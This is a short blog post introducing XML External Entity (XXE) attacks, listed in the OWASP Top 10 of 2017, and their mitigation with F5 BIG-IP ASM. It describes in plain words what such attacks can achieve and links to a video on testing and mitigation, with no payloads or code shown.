F5 BIG-IP ASM - XXE Protection

I wrote about OWASP Top 10 last year where I described the new categories added in 2017. One of them is Insecure Deserialization, another category is Insufficient Logging and Monitoring, which can be got with Security Information and Event Management (SIEM) systems, and the last category added to OWASP is XML External Entity (XXE), which is the category I'm going to write about it today. These categories and the OWASP project were not into the University curriculum when I was studying. I think, it’s a pity because the OWASP project should be taken into account at University as best practices for secure software development.

XXE attack is an injection attack where the attacker inserts a malicious XML code to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks. For instance, we can insert an XML code to list the root directory of the file system or know the server’s hostname. Actually, this issue is not easy to detect by manual testers but SAST and DAST tools can discover and exploit an XXE vulnerability easily. Therefore, if you are working with XML and Web Services, you should also take into account XXE attacks.

XML External Entity (XXE) Attack

 

If you want to know how to test and mitigate a XXE attack, see the next video:

Regards my friend and remember, keep studying!!